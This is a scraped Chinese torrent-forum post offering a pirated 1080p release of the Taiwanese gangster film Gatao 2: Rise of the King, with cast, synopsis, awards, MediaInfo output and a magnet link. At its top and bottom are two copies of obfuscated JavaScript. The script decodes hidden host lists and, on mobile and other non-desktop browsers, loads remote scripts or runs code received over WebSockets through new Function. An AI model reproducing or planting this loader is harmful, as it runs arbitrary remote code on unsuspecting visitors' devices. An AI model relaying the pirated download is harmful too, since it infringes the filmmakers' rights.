角头2:王者再起[国语配音/中文字幕].Gatao.2.Rise.of.the.King.2018.1080p.BluRay.x265.10bit.DTS 5.49GB

版主小s 1月前 393

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 角头2:王者再起 / Gatao 2: Rise of the King

◎片 名 角頭2:王者再起

◎年 代 2018

◎产 地 中国台湾

◎类 别 剧情 / 动作 / 犯罪

◎语 言 汉语普通话 / 闽南语

◎上映日期 2018-02-15(中国台湾)

◎IMDb链接 https://www.imdb.com/title/tt8324576/

◎豆瓣评分 6.6/10 (9547人评价)

◎豆瓣链接 https://movie.douban.com/subject/26994321/

◎片 长 127分钟

◎导 演 颜正国 Ching-kuo Yan (id:1315771)

◎编 剧 Red Chang Red Chang (id:1449684)

孙法钧 Jerry Sun (id:1355923)

◎演 员 王识贤 Jason Wang (id:1314537)

高捷 Jack Kao (id:1276076)

郑人硕 Rexen Cheng (id:1341951)

邹兆龙 Collin Chou (id:1022821)

唐振刚 Chen-Kang Tang (id:1316043)

黄尚禾 Shang-Ho Huang (id:1330444)

张再兴 Tsai-Hsing Chang (id:1358342)

吴震亚 Jen-Ya Wu (id:1348628)

黄腾浩 Tender Huang (id:1006461)

狄莺 Ying Di (id:1315921)

曾珮瑜 Peggy Tseng (id:1317805)

李依瑾 Jean Lee (id:1334547)

许维恩 Sharon Hsu (id:1348519)

古斌 Samuel Ku (id:1324942)

孙绽 Sean Sun (id:1349407)

姚宏易 Hung-i Yao (id:1314541)

萧鸿益 Hung-Yi Hsiao (id:1449011)

姚宏易 Hung-i Yao (id:1314541)

姚国祯 Kuo-Chen Yao (id:1449009)

王嘉莹 Kiara Wang (id:1446038)

杜笃之 Du-Che Tu (id:1275159)

汤湘竹 Shiang-Chu Tang (id:1298902)

杜则刚 Tsekang Tu (id:1337724)

◎标 签 黑帮 / 邹兆龙 / 动作 / 台湾 / 犯罪 / 台湾电影 / 2018 / 剧情

◎简 介

《角头2:王者再起》故事描述仁哥(王识贤 饰演)面对曾经的好兄弟,如今却“走味”变成‘最换帖的敌人’的刘健(邹兆龙 饰演)重现江湖,不断挑起纷争与冲突,破坏仁哥的忍耐与努力维持的和平。看着刘健的事业版图逐渐扩大,身边的兄弟为了情义有所牺牲,仁哥终究按耐不住释放出心中的猛兽,与亦敌亦友的刘健正式开战,为江湖掀起腥风血雨的厮杀。

◎获奖情况 (共5项)

第55届台北金马影展 (2018)

金马奖 最佳男配角(提名)

└──郑人硕 (id:1341951)

金马奖 最佳新演员(提名)

└──张再兴 (id:1358342)

金马奖 最佳原创歌曲(提名)

第20届台北电影节 (2018)

台北电影奖 最佳剧情长片(提名)

└──颜正国 (id:1315771)

台北电影奖 最佳男配角奖

└──郑人硕 (id:1341951)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 317947058658728916574171507679197285181 (0xEF3260481818CE935E42C453E5864B3D)

  4. Complete name : [email protected]BBQDDQ.COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 5.49 GiB

  8. Duration : 2 h 6 min

  9. Overall bit rate : 6 227 kb/s

  10. Movie name : Gatao 2 Rise of the King 2018

  11. Encoded date : UTC 2021-10-13 07:56:55

  12. Writing application : mkvmerge v57.0.0 ('Till The End') 64-bit

  13. Writing library : libebml v1.4.2 + libmatroska v1.6.4


  14. Video

  15. ID : 1

  16. Format : HEVC

  17. Format/Info : High Efficiency Video Coding

  18. Format profile : Main [email protected]@Main

  19. Codec ID : V_MPEGH/ISO/HEVC

  20. Duration : 2 h 6 min

  21. Bit rate : 4 685 kb/s

  22. Width : 1 920 pixels

  23. Height : 720 pixels

  24. Display aspect ratio : 2.667

  25. Frame rate mode : Constant

  26. Frame rate : 24.000 FPS

  27. Color space : YUV

  28. Chroma subsampling : 4:2:0

  29. Bit depth : 10 bits

  30. Bits/(Pixel*Frame) : 0.141

  31. Stream size : 4.13 GiB (75%)

  32. Writing library : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit+8bit+12bit

  33. Encoding settings : rc=crf / crf=16.5000 / qcomp=0.60 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.90 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / no-pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=4 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1920x720 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  34. Default : Yes

  35. Forced : No


  36. Audio

  37. ID : 2

  38. ID in the original source medium : 4352 (0x1100)

  39. Format : DTS

  40. Format/Info : Digital Theater Systems

  41. Codec ID : A_DTS

  42. Duration : 2 h 6 min

  43. Bit rate mode : Constant

  44. Bit rate : 1 509 kb/s

  45. Channel(s) : 6 channels

  46. Channel layout : C L R Ls Rs LFE

  47. Sampling rate : 48.0 kHz

  48. Frame rate : 93.750 FPS (512 SPF)

  49. Bit depth : 16 bits

  50. Compression mode : Lossy

  51. Stream size : 1.33 GiB (24%)

  52. Title : Mandarin

  53. Language : Chinese

  54. Default : Yes

  55. Forced : No

  56. Original source medium : Blu-ray


  57. Text #1

  58. ID : 3

  59. ID in the original source medium : 4609 (0x1201)

  60. Format : PGS

  61. Muxing mode : zlib

  62. Codec ID : S_HDMV/PGS

  63. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  64. Duration : 1 h 57 min

  65. Bit rate : 15.9 kb/s

  66. Count of elements : 2082

  67. Stream size : 13.4 MiB (0%)

  68. Title : chs

  69. Language : Chinese

  70. Default : Yes

  71. Forced : No

  72. Original source medium : Blu-ray


  73. Text #2

  74. ID : 4

  75. ID in the original source medium : 4610 (0x1202)

  76. Format : PGS

  77. Muxing mode : zlib

  78. Codec ID : S_HDMV/PGS

  79. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  80. Duration : 1 h 57 min

  81. Bit rate : 16.1 kb/s

  82. Count of elements : 2082

  83. Stream size : 13.5 MiB (0%)

  84. Title : cht

  85. Language : Chinese

  86. Default : No

  87. Forced : No

  88. Original source medium : Blu-ray


  89. Text #3

  90. ID : 5

  91. ID in the original source medium : 4608 (0x1200)

  92. Format : PGS

  93. Muxing mode : zlib

  94. Codec ID : S_HDMV/PGS

  95. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  96. Duration : 1 h 57 min

  97. Bit rate : 36.9 kb/s

  98. Count of elements : 2083

  99. Stream size : 30.9 MiB (1%)

  100. Language : English

  101. Default : No

  102. Forced : No

  103. Original source medium : Blu-ray


  104. Menu

  105. 00:00:00.000 : Chapter 01

  106. 00:12:52.833 : Chapter 02

  107. 00:24:53.750 : Chapter 03

  108. 00:35:29.250 : Chapter 04

  109. 00:49:07.458 : Chapter 05

  110. 01:00:03.541 : Chapter 06

  111. 01:12:20.375 : Chapter 07

  112. 01:24:03.708 : Chapter 08

  113. 01:36:14.208 : Chapter 09

  114. 01:50:33.291 : Chapter 10




复制代码


TAGS 动作 剧情 犯罪

磁力链:
  • magnet:?xt=urn:btih:F4D3E794F9871984162E3D0B49991807FC6DFA9A

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};